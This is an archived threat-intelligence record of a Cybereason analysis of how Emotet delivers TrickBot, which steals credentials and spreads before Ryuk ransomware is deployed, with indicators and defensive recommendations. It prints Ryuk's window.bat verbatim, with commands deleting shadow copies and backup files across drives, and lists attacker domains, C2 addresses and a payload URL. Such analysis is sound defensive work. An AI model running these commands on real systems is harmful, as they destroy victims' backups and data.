{
	"id": "ee4850d7-bf45-44f2-8f17-a2251e934cfd",
	"created_at": "2026-04-06T00:12:26.776716Z",
	"updated_at": "2026-04-10T03:22:11.927137Z",
	"deleted_at": null,
	"sha1_hash": "d79bac860935bbf5d287f96651e5d0b5b59e4b7e",
	"title": "Triple Threat: Emotet Deploys TrickBot to Steal Data \u0026 Spread Ryuk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3776913,
	"plain_text": "Triple Threat: Emotet Deploys TrickBot to Steal Data \u0026 Spread\r\nRyuk\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 18:46:17 UTC\r\nWHAT IS Ryuk RANSOMWARE\r\nRyuk ransomware was first detected in August 2018 in targeted attacks through an unknown infection method.\r\nThe ransomware scoped out a target, gained access via Remote Desktop Services or other direct methods, stole\r\ncredentials, and then targeted high-profile data and servers to extort the highest ransom possible. By January 2019,\r\nan active campaign of the Ryuk ransomware was discovered targeting victims who were previously attacked by\r\nTrickBot. Another recently discovered campaign of Emotet-TrickBot-Ryuk was used to deploy and initiate the\r\nRyuk ransomware. That differs from the campaign mentioned in this research, as this campaign describes each\r\nphase of the attack in detail, as well as the use of TrickBot to steal sensitive information before deploying Ryuk to\r\nransom victims data.\r\nWHAT IS TRICKBOT\r\nAlthough trojans typically target individuals to steal bank account credentials, the TrickBot trojan was being used\r\nto deliver secondary malware in a similar way to what is detailed in this research. The difference from the\r\ncampaign mentioned in this research is that as this campaign uses TrickBot to steal sensitive information, it also\r\ndeploys Ryuk to ransom victims data. Criminals targeting large enterprises used spam emails to deliver the Emotet\r\ntrojan in order to distribute the TrickBot malware. Once a machine is infected with the TrickBot malware, it\r\nbegins to steal sensitive information and the criminal group tries to determine if the company is an industry target.\r\nIf so, they deliver the Ryuk ransomware.\r\nWHAT IS EMOTET\r\nEmotet was discovered in 2014 and used as a trojan by threat actors to steal banking credentials. More recently, it\r\nhas been used as a dropper of other sophisticated malware.\r\nEmotet has introduced several advanced capabilities over the years using a modular structure that features\r\nmultiple modules including an installation module, a banking module, and a DDoS module. Emotet’s main\r\ndistribution method remains phishing emails, which use various social engineering techniques to fool a user into\r\nclicking a malicious link or downloading a malicious Microsoft Office file.\r\nPhase One: Emotet Downloads TrickBot\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 1 of 39\n\nFlow of the attack as Emotet delivers TrickBot, which delivers Ryuk. Workflow chart originally created by the\r\nKryptos Logic team for their blog on the same topic.\r\nThe first stage of the attack starts with a weaponized Microsoft Office document attached to a phishing email. This\r\nfile contains a malicious, macro-based code. Once the user opens the document, the malicious file will run cmd\r\nand execute a PowerShell command. The PowerShell command attempts to download the Emotet payload.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 2 of 39\n\nMacro-embedded Microsoft Word document.\r\nIn recent attacks, Cybereason’s research team has spotted Emotet adapting in order to be used as a dropper for the\r\nTrickBot banking trojan. This is an expansion from its previous information-stealing capabilities.\r\nThe execution flow of Emotet starts within outlook.exe, where the phishing email was received. Following that,\r\nwinword.exe opens the malicious attachment from the email and executes a cmd to run PowerShell. This\r\ncommand downloads and executes the Emotet payload. \r\nThe Emotet process tree in the Cybereason Platform.\r\nThis cmd instance has an obfuscated command line. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 3 of 39\n\nCMD Emotet dropper obfuscated command line. \r\nWhen deobfuscated in memory, the command line is translated into a Powershell script.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 4 of 39\n\nPowerShell Emotet dropper obfuscated command line. \r\nThe PowerShell instance attempts to download the Emotet payload from different malicious domains after\r\n“building” the download URLs from multiple chunks. It names the payload 379.exe (SHA1:\r\nB521fe7ff72e68165ff767d7dfa868e105d5de8b) and executes it.\r\nThe PowerShell script attempts to download the Emotet payload from the following domains:\r\nefreedommaker[.]com\r\nretro11legendblue[.]com\r\noussamatravel[.]com\r\ncashcow[.]ai\r\nshahdazma[.]com \r\nThe Cybereason Platform identifying the connection to the C2 server to download the Emotet payload.\r\nWhen the Emotet payload executes, it looks to continue its malicious activity by further infecting and gathering\r\ninformation on the affected machine. It initiates the download and execution of the TrickBot trojan by\r\ncommunicating with and downloading from a pre-configured and remote malicious host. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 5 of 39\n\nThe process tree of Emotet delivering TrickBot as seen in the Cybereason Platform.\r\nPhase Two: Lateral Movement\r\nTrickBot is a modular trojan that unpacks itself in memory. It is often called a banking trojan, however, its\r\nmodular structure allows it to freely add new functionalities outside of collecting banking data. Collecting bank\r\ndata is just one of its many potential modules. \r\nIn previous iterations, TrickBot was fairly simple. However, it has been improved over the years to include extra\r\nmodules advanced capabilities like password collecting and detection evasion.\r\nWhen TrickBot executes, it creates an installation folder under C:\\user\\AppData\\Roaming\\%Name%, where\r\n%Name% is dependent on the bot version. This folder contains a copy of the malware with a slightly different\r\nname, a settings.ini file, and a Data folder. \r\nTrickBot’s installation folder.\r\nsettings.ini is an obfuscated file that contains an encoded BotKey. This BotKey is generated uniquely per machine.\r\nWe were able to extract the BotKey and decrypt the modules and their configuration files. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 6 of 39\n\nThe contents of settings.ini.\r\nThe Data folder contains the encrypted malicious modules along with their configuration files. \r\nThe contents of the Data folder.\r\n In order to ensure persistence, TrickBot creates a scheduled task and a service. The scheduled tasks name is\r\ndependent on the variant of the malware; in this case it is named \\NetvalTask. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 7 of 39\n\nTrickBot persistence using a scheduled task.\r\nThe service registry entry name is randomly generated and located under the services hive (\r\n\\HKLM\\System\\CurrentControlSet\\Services\\{Random_name}\\imagePath).\r\nTrickBot persistence using the registry key.\r\nThe malicious modules are reflectively injected into legitimate processes including svchost in order to evade\r\ndetection. In order to reduce the likelihood of being detected by an antimalware product, TrickBot tries to disable\r\nand delete Windows Defender.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 8 of 39\n\nThe Cybereason Platform shows the process flow of how TrickBot disables Windows Defender.\r\nLoading and Running TrickBot’s Malicious Modules\r\nThe malicious modules are reflectively loaded into svchost. Below are descriptions of the modules and how they\r\nfit and fulfil their role in TrickBot’s malicious activity.\r\nTrickBot modules reflectively loaded into svchost. \r\nmodule64.dll\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 9 of 39\n\nmodule64.dll is the TrickBot dropper. It downloads the TrickBot loader mswvc.exe (SHA1:\r\nf84e0f022a0a263146e94ae3dd38cb5a8534fbfa) and installs it locally or shared on the network for lateral\r\nmovement.\r\n Note: This writeup renames mswvc.exe to trickbot.exe to facilitate the understanding of the attack (SHA1:\r\nd6ee45108278bc13df1bdcc6280f4daba11e05c5).\r\nThe module makes a connection over HTTP to a hardcoded address. From there, it creates a file locally with a\r\npayload masquerading as a PNG file. In this instance, the malware connected and dumped the contents of the\r\nPNG file locally from http://192.161.54[.]60/radiance.png.\r\n \r\nConnection to the distribution server and download of the payload as shown in the Cybereason Platform.\r\nThe module receives the contents of the PNG payload and writes it to a local file on the machine. The module\r\ncopies it to network shares to spread and improve lateral movement. \r\nNetwork shares folders that TrickBot uses to spread.\r\nThe dropped file is registered as an auto-start service to give TrickBot persistence and a foothold on the target\r\nmachine. This service can have any one of the display names in the figure below.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 10 of 39\n\nService display names.\r\nService creation.\r\nmodule.dll\r\nmodule.dll steals data from the browser, including cookies, HTML5 local storage, browsing history, Flash Local\r\nShared Objects, and URL hits. TrickBot injects module.dll into svchost, which creates a hidden virtual instance of\r\nthe victim's desktop. It harvests browser data by creating a tunnel and listening to the connections through other\r\nsvchost processes that were also injected with module.dll, and are listening on the same ports. \r\nmodule.dll injected into svchost.exe.\r\nProxy tunneling of explorer browser.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 11 of 39\n\nInjected svchost listening on the same port.\r\nThis module uses different artifacts that store sensitive data including registry entry, browser plugins, and a hard-coded SQLite database that retrieves and steals data from locally stored databases.\r\nBrowser registry entries hard-coded into module.dll.\r\nSQLite is used to retrieve and steal cookies.\r\nInformation gathering on the installed plugins.\r\nThe following images were also hardcoded in Base64-encoding in module.dll. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 12 of 39\n\nBase 64-decoded pictures.\r\nvncsrv.dll\r\nTrickBot uses a hidden VNC injected into svchost.exe as a remote administration tool. The VNC allows an\r\nattacker to remotely view and control a victim’s desktop without the victim noticing.\r\nThe injected svchost, loaded with vncsrv.dll, spawns a Chrome browser instance. The browser instance launches\r\nwith a command to alter the browsers default settings to evade detection and bypass security defense mechanisms.\r\nIn this case, it is the Chrome sandbox. In order to evade detection additionally, TrickBot remains quiet and hidden\r\nfrom the user on the victim machine by disabling any interaction with the user interface, including audio and\r\ngraphics. The hidden VNC leverages TrickBot’s foothold in order to simplify the process of logging into the\r\nvictim’s financial institution. \r\nSetting interruption for the Chrome browser.\r\nsocks5dll.dll\r\nIn previous iterations, this module communicated with the TrickBot C2 server using the socks protocol to tunnel\r\ndata and connections through the victim’s host. socks5 brings additional authentication, so that only authorized\r\nusers can access the proxy tunnel. socks5 supports the tunneling of DNS requests, which eliminates the threat of\r\nDNS leaks. socks5dll.dll has hardcoded C2 servers that it will create an authenticated connection with.\r\nThe Cybereason Platform information on the TrickBot C2 server.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 13 of 39\n\nThe connection to the TrickBot C2 server as shown in the Cybereason Platform.\r\n The malware uses a user agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) to connect to one\r\nof the hard-coded TrickBot C2 IPs in socks5dll.dll:\r\n69.164.196[.]21\r\n107.150.40[.]234\r\n162.211.64[.]20\r\n217.12.210[.]54\r\n89.18.27[.]34\r\n193.183.98[.]154\r\n51.255.167[.]0\r\n91.121.155[.]13\r\n87.98.175[.]85\r\n185.97.7[.]7 \r\nsystemInfo.dll\r\nsystemInfo.dll helps the attacker determine if the affected machine meets the criteria for infection with the Ryuk\r\nransomware. TrickBot uses this module to harvest system information off of the infected machine to provide\r\nattackers with a better understanding of the system they have infected. It uses WQL to query win32_Processor and\r\nharvest information about the processor of the machine and the system architecture (whether it is 32-bit or 64-\r\nbit). \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 14 of 39\n\nThe use of WQL by systeminfo.dll. \r\nTrickBot also uses native Windows API functions GetNativeSystemInfo() and GetSystemInfo() to get more\r\ninformation about the machine.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 15 of 39\n\nThe native Windows API being used to harvest information by systeminfo.dll.\r\nmailsearcher.dll\r\nmailsearcher.dll searches all files on disk and compares their extensions to a predefined list.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 16 of 39\n\nA predefined list of extensions the malware searches for.\r\nmailsearcher.dll also uses the WinHTTP library in order to send data over HTTP to the C2 server.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 17 of 39\n\nThe use of the WinHttp library.\r\nloader.dll\r\nloader.dll’s purpose is solely to ensure that other modules will be successfully loaded reflectively.\r\npwgrab.dll\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 18 of 39\n\npwgrab.dll harvests saved user credentials from browsers, registry keys, and other programs such as Outlook. \r\nTrickBot steals username and password information by copying login db, and steals card details by copying\r\nwebdata db. All of the information stored is encrypted, so TrickBot uses a decryption mechanism and saves the\r\ndata as plain text. \r\nTrickBot copying the Chrome database files.\r\ncore-dll.dll\r\ncore-dll.dll is the main TrickBot bot. There are two layers of protection the malware must remove before it can be\r\nused. This module is encrypted and stored inside the loader as one of the resources. Following the decryption and\r\nunpacking, it is reflectively injected into the following browsers to steal credentials.\r\nThe browsers targeted in core-dll.dll.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 19 of 39\n\nExporting the reflective DLL injection library.\r\ndll.dll\r\nTrickBot’s reverse-shell module, dll.dll, is responsible for two things. First, it performs reconnaissance in order to\r\ncollect information about the target machine. Second, it launches Powershell Empire to perform reconnaissance\r\nactivities with the end goal of launching an Empire backdoor. In order to initiate reconnaissance, TrickBot uses\r\nthis DLL to run commands such as ipconfig, net commands, and nltest. \r\nA breakdown of the reconnaissance activity of TrickBot by the Cybereason Platform.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 20 of 39\n\nThe floating module responsible for the reconnaissance activity.\r\nAs mentioned, TrickBot also uses PowerShell Empire to perform reconnaissance and lateral movement. dll.dll is\r\nused to execute obfuscated PowerShell scripts in order to ultimately download and launch an Empire backdoor.\r\nAs part of its reconnaissance, TrickBot uses Invoke-Portscan to locate and detect valuable assets in the\r\norganization including domain controllers, file servers, and more. The collected data will be used to target assets\r\nand infect them with the Ryuk ransomware. \r\nA visualization of the PowerShell empire process tree by the Cybereason Platform.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 21 of 39\n\nThe Top Port scan by the Cybereason Platform. \r\nscreenLocker_x64.dll\r\nscreenLocker_x64.dll helps TrickBot with its reconnaissance and credential harvesting process. After being\r\ninjected by TrickBot, svchost.exe was seen injecting into explorer.exe as well.\r\nsvchost.exe injecting into explorer.exe. \r\nOne of the modules loaded into explorer.exe is one of TrickBot’s very own modules: screenLocker_x64.dll. \r\nEvidence of the screenLocker module being loaded by explorer.exe. \r\nTrickBot uses a component of mimikatz to extract credentials from the target system. It targets WDigest\r\ncredentials stored in LSA memory in plain text. Microsoft introduced a way to mitigate this attack by adding a\r\nswitch in the form of a registry entry, and has addressed this issue with KB2871997 and KB2928120.\r\nTo disable the storage of WDigest credentials in memory, the registry entry value must be set to 0. In order to\r\nensure the tool succeeds in obtaining user credentials, it verifies that the registry entry is enabled by setting it to 1.\r\nHowever, to successfully collect credentials, the user will have to log into the system after the registry\r\nmodification takes place so the credentials can be stored in memory. In order to ensure this takes place, the\r\nmodule starts a routine that locks the users screen so they must enter their login credentials to gain access to the\r\nsystem. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 22 of 39\n\nThe LockWorkStation function, which is in charge of locking the users screen.\r\nA hard-coded registry entry inside the module called WDigest contains the credentials\r\n(\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\Wdigest\\). \r\nThe WDigest registry entry.\r\nThe module contains a list of Microsoft operating systems to compare to the operating system of the infected\r\nmachine while working its role in TrickBot’s activity. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 23 of 39\n\nA list of the operating systems inside the screen locker module.\r\nThe part in the module that is able to lock the workstation of an affected user is inside the files overlay. There is an\r\nindicator in the module that points to another file inside of it: \r\nThe overlay indicator.\r\nBy dumping the overlay of the module to a file and opening it in a hex editor, it’s possible to see that the overlay\r\ncontains the WDigest registry entry, as well as the process the module will be injected into to fetch the users\r\ncredentials (explorer.exe). \r\nContents of the dumped file opened in a hex editor.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 24 of 39\n\nA full flow visualized in the Cybereason Platform of the screenLocker_x64.dll module and related injections.\r\nspreader_x64.dll\r\nspreader_x64.dll contains two of the main capabilities of TrickBot: spreading by exploiting the EternalBlue\r\nvulnerability, and using mimikatz to perform credential theft.\r\n The Cybereason Platform identified lsass access (the mimikatz activity of dumping the memory of lsass.exe),\r\nfloating executable code (the reflectively injected DLL spreader_x64.dll), and a high internal connection rate,\r\nwhich indicates that it is scanning in order to help spread.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 25 of 39\n\nEvidence of the malicious activity perpetrated by Spreader_64.dll, shown by the Cybereason Platform.\r\nspreader_x64.dll uses the EternalBlue vulnerability to spread via SMB (port 445). \r\nA Cybereason Platform visualization of the connection via port 445 as part of EternalBlue. \r\nEternalBlue strings in the spreader_x64.dll binary.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 26 of 39\n\nspreader_x64.dll also contains the mimikatz binary. When executed, it dumps credentials by opening a command\r\nprompt window and run mimikatz.\r\n PwDumper_x64.dll is also reflectively injected into the svchost process in order to perform the dumping.\r\nPwDumper_x64.dll reflectively loaded into svchost.exe. \r\n mimikatz strings in the spreader_x64.dll binary.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 27 of 39\n\nmimikatz strings in the spreader_x64.dll library.\r\nPhase Three: Post-exploitation Activity\r\nOnce the machine is infected with TrickBot, the attackers check to see if the target machine is part of an industry\r\nthey are looking to target. If it is, they download an additional payload and use the admin credentials stolen using\r\nTrickBot to perform lateral movement and reach the assets they wish to infect. \r\nThe attacker logged into a domain controller and copied tools into a temporary directory. It copied tools like\r\nAdFind.exe (the Active Directory enumeration utility), a bat script that uses AdFind to save output into text files,\r\nand a copy of the 7-Zip archive utility. \r\nAfter the attacker gathers a list of domain controllers and targeted servers in the environment, they test if there is a\r\nconnection available using ping.exe and mstsc.exe (RDP). \r\nOnce the attacker has a connection, they start to spread the Ryuk payload through the network via Windows\r\nadministrative shares (MITRE ATT\u0026CK Technique T1077). These are hidden shares like Admin$, IPC$, Share$\r\nand C$ that are enabled by default on Windows hosts for administrative purposes.\r\n The attacker drops a few files in the hidden share share$, including a .bat script COPY.bat. This script lists one or\r\nmore of the targeted machines that the attacker located, a copy of psexec.exe that is signed and verified, and the\r\nRyuk dropper Ryuk.exe. The attacker runs the .bat script, which uses the psexec.exe file with the stolen admin\r\ncredentials to gain a remote shell and copy the malicious Ryuk payload to a temporary folder in the remote hosts\r\nlisted in the text file comps{number}.txt. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 28 of 39\n\nExecution of the .bat script as shown in the Cybereason Platform.\r\nThe PsExec command line. \r\nOnce this is complete, the Ryuk payload is executed using PsExec.\r\n \r\nThe attack flow, beginning with the malicious email and ending with the Ryuk execution. \r\nRyuk Ransomware delivered\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 29 of 39\n\nThe ransomware dropper Ryuk.exe checks the system architecture and drops its main payload accordingly.  \r\nThe Ryuk ransomware analysis: checking the system architecture.\r\nWhile dropping the payload, it generates a random name made up of five letters based on the Srand() function.\r\nThe payload is stored under this name in a location dependent on the OS version on the target machine. If the OS\r\nVersion is XP or older, it writes a file at \\Documents and Settings\\Default User\\. If the target machine is running a\r\nnewer version, it writes a file at \\Users\\Public\\.\r\nThe Ryuk ransomware analysis: choosing the target folder.\r\nThe dropper also stops multiple services related to antimalware products by using the net stop command:\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 30 of 39\n\nThe Ryuk ransomware analysis: net stop commands.\r\nIt kills multiple processes related to the antimalware product using the taskkill command \r\nThe Ryuk ransomware analysis: taskkill commands. \r\nThe main Ryuk payload (hszuw.exe, SHA1: d78c955173c447cb79fb559de122563d90d5358d) is responsible for\r\ninjecting into other processes and achieving persistence using the registry. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 31 of 39\n\nThe Ryuk payload creates persistence, shown in the Cybereason Platform.\r\n The registry key is under the Run hive, and named svchos. It is responsible for running the Ryuk payload every\r\ntime the current user logs on. \r\nCreation of the registry key.\r\nThe malware creates a snapshot of all running processes using CreateToolhelp32Snapshot() and iterates over it\r\nusing Process32First()and Process32Next().\r\nThe malware then compares the handle of the process to the handle of lsass.exe, csrss.exe, and explorer.exe. If the\r\nhandle is not one of the above, the malware injects the malicious payload into the remote process.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 32 of 39\n\nThe Ryuk ransomware analysis: checking the running processes.\r\nThe Ryuk ransomware analysis: creating exceptions.\r\nIn this example, the payload was injected into several processes including taskhost.exe: \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 33 of 39\n\nThe Ryuk payload injects into the remote process taskhost.exe.\r\nThe floating PE in taskeng.exe.\r\nRyuk uses an injection technique, where it gets a handle of the target process using OpenProcess()and allocates a\r\nbuffer in its address space using VirtualAllocEx().\r\nRyuk writes its current virtual content into this process using WriteProcessMemory() and creates a remote thread\r\nthat will execute code using CreateRemoteThread().\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 34 of 39\n\nFunctions used for process injection in the Ruyuk binary.\r\nThe injected processes, in this case taskhost.exe, run a .bat file dropped by the malware,\r\nC:\\users\\Public\\window.bat. This file contains multiple uses of vssadmin and deletes commands in order to change\r\nconfiguration and delete Virtual Shadow Copy. vssadmin.exe is a command-line tool that manages Volume\r\nShadow Copy Service (VSS), which captures and copies stable images for backup on running systems.\r\nRansomware commonly uses vssadmin.exe to delete shadow copies and other backups of files before encrypting\r\nthe files themselves. This ensures that the victim will be forced to pay to decrypt the valuable files when they can\r\nneither be decrypted or retrieved from VSS.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 35 of 39\n\nThe window.bat script spawns vssadmin commands, as shown in the Cybereason Platform.\r\n The contents of window.bat:\r\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 36 of 39\n\ndel /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.w\r\ndel /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.w\r\ndel /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.w\r\ndel /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.w\r\ndel /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.w\r\ndel /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.w\r\ndel %0\r\n The Cybereason Platform was able to raise an alert thanks to the suspicious behavior of the injected taskhost. \r\n \r\nAn alert for ransomware in the Cybereason Platform. \r\nRyuk encrypts files on the disk and changes the extension to .RYK.\r\nRyuk changing the extensions of the files to .RYK.\r\nRyuk drops a ransom note RyukReadMe.txt created with notepad.exe in every processed folder. \r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 37 of 39\n\nThe creation of the ransom note.  \r\nThe contents of the Ryuk ransom note.  \r\nConclusion\r\nTrickBot is classified as a banking trojan, but the banking-related capability is just one of its many abilities.\r\nTrickBot is able to communicate with a C2 server as well as collect and exfiltrate sensitive data ranging from\r\nbanking credentials, usernames and passwords, and personal data. An attacker with this information can easily\r\ndestroy trust in a business, wreck the reputation of a brand, or compromise individuals and cost companies money.\r\nOnce Ryuk infects the machine, it starts to encrypt files and spreads through the network to infect more machines.\r\nThis increases the damage and the likelihood that the victim will be willing to pay the ransom. This threat, due to\r\nits advanced capabilities and spreading ability, can cause a great deal of damage to an organization, from loss of\r\nmoney to brand degradation.\r\nOur customers were able to use our remediation tool of the Cybereason Platform to immediately stop the\r\nexfiltration and prevent future execution of these kind of malicious files in the organization. Cybereason’s Active\r\nMonitoring team and Hunting team were able to detect both the malicious file related to TrickBot and the\r\noperations and modules used to perform its activity. This includes reconnaissance, credential harvesting and\r\nspreading using the PowerShell Empire framework, mimikatz, and EternalBlue. All of these activities work to\r\ndistribute and deliver an additional payload, in this instance the Ryuk ransomware.\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 38 of 39\n\nReduce the costs in your SOC by applying the right roles to SIEM and EDR. Read our white paper to learn how. \r\nResearch by Noa Pinkas, Lior Rochberger, and Matan Zatz\r\nCybereason’s Active Monitoring and Hunting teams have uncovered a severe threat that uses the Emotet trojan\r\nand the TrickBot trojan to deliver the Ryuk ransomware. During the past few weeks, the Cybereason Active\r\nMonitoring team has encountered multiple incidents of attempted TrickBot infection. Among these incidents and\r\ninvestigations, the team observed Ryuk ransomware infection attempts as well. The nature of Ryuk deployment\r\nand execution tactics, techniques, and procedures can vary across incidents. However, the Cybereason Active\r\nMonitoring team was able to identify that machines infected with TrickBot were susceptible to a future infection\r\nwith Ryuk.\r\nThough TrickBot is known as a banking trojan, in this campaign its banking capabilities are one of many abilities.\r\nIn this instance, it is able to communicate with a C2 server to collect and exfiltrate a range of sensitive data. It is\r\nalso able to deploy the Ryuk ransomware, which encrypts files throughout the network and increases the damage\r\nto the end user. These threats result in brand degradation, damage to an organization, and damage to the\r\nindividual.\r\nSecurity Recommendations\r\nEducate your team on how to correctly handle suspicious emails to prevent initial downloading or dropping\r\nof malware.\r\nIn order to protect against lateral movement, do not use privileged accounts, avoid RDPs without properly\r\nterminating the session, do not store passwords in plain text, deploy good authentication practices, disable\r\nunnecessary share folders, and change the names of the default share folders used in your organization.\r\nMake sure you systems are patched, especially CVE-2017-0144, to prevent the propagation of TrickBot\r\nand other malware.\r\nDisable macros across the environment.\r\nFollow Microsoft’s security advisory update on improving credentials protection and management in your\r\norganization.\r\nProactively approach security by performing hunts and searching for suspicious behavior before an\r\nincident starts.\r\nRemove any persistence mechanisms that may have been used by any of the malware mentioned here in\r\norder to mitigate the threat.\r\nWorried about getting hit with an attack like this? Close the holes in your defense with MITRE ATT\u0026CK. Read\r\nour white paper to learn how.\r\nDownload the Five Stages to Create a Strategic, Closed-loop Security Process with MITRE ATT\u0026CK white\r\npaper.\r\nSource: https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 39 of 39",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware"
	],
	"report_names": [
		"triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434346,
	"ts_updated_at": 1775791331,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.pdf",
